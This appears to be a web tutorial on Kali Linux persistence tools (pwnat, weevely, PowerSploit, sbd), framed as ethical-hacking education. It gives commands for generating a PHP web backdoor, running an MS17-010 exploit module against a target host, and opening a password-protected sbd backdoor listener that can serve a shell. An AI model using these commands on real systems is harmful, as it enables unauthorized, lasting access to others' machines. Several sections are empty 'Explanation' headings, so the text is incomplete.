Open In App

We use cookies to ensure you have the best browsing experience on our website. By using our site, you acknowledge that you have read and understood our Cookie Policy & Privacy Policy

Maintaining Access Tools in Kali Linux

Maintaining Access is the 4th phase in the ethical hacking process. In this phase, the hacker installs software or makes changes to the target machine to access the target later in time. This allows the hacker to stay connected with the target machine, thus cutting the need of starting the process from scratch for the same target. This phase is also called persistence in the target system.



 

The various methodologies used in the ‘maintaining access‘ phase are as follows: –

Kali Linux Tools for Maintaining Access

Kali Linux is a Debian-based Linux distribution that is designed for the sole purpose of penetration testing. It comes with tons of pre-installed hacking tools for all phases of ethical hacking. Under the post-exploitation category, you can find several hacking tools that are meant for maintaining access. These tools can be broadly classified into the following classifications: –



In this article, we will discuss some of the important and popular maintaining access tools in Kali Linux.

Note

  • Angular brackets ‘<>’ are used as place holders in the commands mentioned. Please replace the place holders with suitable content. 
  • If you get a ‘permission denied’ error while executing any of the commands, prefix the command with ‘sudo’ to execute the command as super user.
  • The knowledge acquired through this article can be used for educational purposes only.

Tool 1: pwnat

pwnat is used to set up a proxy server that works behind a NAT (Network Address Translation) type of network that accepts connections from any number of clients behind NATs, without any 3rd party. 

sudo apt install pwnat

Once the tool is installed in your Kali Linux machine, you can use the help option to get a list of available operations in this tool.

pwnat -h
 

We use pwnat in two ways: as a server and as a client. So that we will be able to understand the core usage of this tool. Let’s start by setting up a pwnat server using the command below.

sudo pwnat -s 8080
 

For simplicity, I’m running both the server and the client on the same machine. Now, open another terminal and initiate a pwnat client in order to connect to the server which is running already. Let’s connect to geeksforgeeks.org from our pwnat client, using the pwnat server as a proxy. The command to do the same is given below.

sudo pwnat -c 8080 127.0.0.1 geeksforgeeks.org 443
 

Once the connection is established, the server continuously displays status messages in the terminal. 

sudo pwnat -s 8080
 

Explanation

Tool 2: weevely

weevely is a built-in tool in Kali Linux that aims at generating payloads that can be used as back doors on targeted web servers. weevely also provides options to connect to the back door via the terminal and execute remote commands. 

Enter the name of this tool in your terminal to check if it is installed on your machine.

weevely
 

If you see this list of available options in the terminal, you have weevely already installed it. Else, enter the following command to install weevely.

sudo apt install weevely

Let’s now create a sample php web back door to learn the usage of this tool. In the above screenshot of weevely options, you can see the syntax for creating a new agent which is nothing but a new payload. We are going to use the same syntax here.

weevely generate GFG123 /home/matrix_angel/Desktop/backdoor.php

Explanation

 

Now you can list out the contents of the directory using the ‘ls‘ command to find the payload present in it. 

ls
 

Since this procedure is a part of post-exploitation, We assume that you have already found a way to upload this payload to the target web server. Once the upload is completed, you will be able to open a session with the web server and access its data. 

Tool 3: powersploit

powersploit is a collection of Microsoft PowerShell modules that are used for a wide range of assessments that can be done after exploiting a machine, by an authorized penetration tester. Basically, it is a collection of executable scripts. It can be used to do the following assessments:

This tool is on our list of maintaining access tools due to its capability to achieve persistence in the target machine. 

Simply enter ‘powersploit‘ in the terminal and hit ‘enter’ to change the directory to where powersploit is located. 

powersploit
 

Each of these listed directories consists of various scripts to be utilized by a penetration tester. Let’s take a look at a command that uses powersploit scripts to find and exploit a vulnerability.

Get-NetWMIObject -Class win32_service -Filter "name='msftpsvc'" -ComputerName <TargetHostName> | Invoke-MS17-010

Explanation

Tool 4: sbd

sbd stands for Shadow integer Backdoor. It is Netcat-clone which is designed to enhance portability and security. It implements AES-CBC-128 + HMAC-SHA1 which is a strong encryption algorithm. If you are not familiar with Netcat, it is a simple tool that can be used to read and write data across a network. Basically, sbd acts as an OS backdoor and helps to connect to a victim’s machine at any time on a specific port and send commands remotely,

This tool is built-in in Kali Linux. You can use the below command to check if the tool is available on your machine.

sbd -h

This command will return a list of options available in this tool. After successfully exploiting the target machine, you can set up a sbd server in the target machine which acts as a backdoor and keeps listening for incoming connection requests. The syntax for the command to setup a sbd server is given below: –

sbd -l -p 7986 -c off -P "GFG_Ethical_Hacker" -H
 

Explanation

Now, let’s connect to the listening sbd server via telnet. The command to use can be seen below.

telnet localhost 7986

Explanation

We have successfully connected to the target machine via telnet. We could also execute programs like bash by using the ‘-e’ option while setting up our server.

Conclusion

The ‘maintaining access’ phase is a crucial stage in the ethical hacking process as it determines the availability of access to the target in the future. If this phase gets failed, the whole process needs to be started from the beginning. The built-in tools of Kali Linux for maintaining access provide a handy way to successfully complete this phase with ease. This is one of the many features of Kali Linux that makes it a sophisticated OS for ethical hacking and penetration testing. 


Article Tags :
Linux-Unix
Recommended Articles
1. Kali-Whoami - Stay anonymous on Kali Linux
2. Gobuster - Penetration Testing Tools in Kali Tools
3. OpenDoor - OWASP Directory Access Scanner in Kali Linux
4. How to Access the Dark Web Using the TOR Browser in Kali Linux
5. Kali Linux Tools
6. Kali Linux - Exploitation Tools
7. Kali Linux - Information Gathering Tools
8. Kali Linux - Vulnerability Analysis Tools
9. Kali Linux - Web Penetration Testing Tools
10. Top 10 Kali Linux Tools For Hacking
11. Kali Linux - Wireless Attack Tools
12. Kali Linux - Forensics Tools
13. Hacking Tools for Penetration Testing - Fsociety in Kali Linux
14. KitHack - Hacking tools pack in Kali Linux
15. XCTR-Hacking-Tools - Information Gathering in Kali Linux
16. Hardware Hacking and Social Engineering Tools in Kali Linux
17. Reporting Tools in Kali Linux
18. WIFIPhisher Kali Linux Tools
19. Database Assessment Tools for Kali Linux
20. How To Use Steghide And StegoSuite Steganography Tools In Kali Linux
21. Difference Between Arch Linux and Kali Linux
22. Netnoob - Network tools, information gathering tools and scanning tools
23. Kali Linux - Password Cracking Tool
24. XSS-Freak - XSS Scanner Fully Written in Kali Linux
25. Sherlock - Hunt Username on Social Media Kali Linux Tool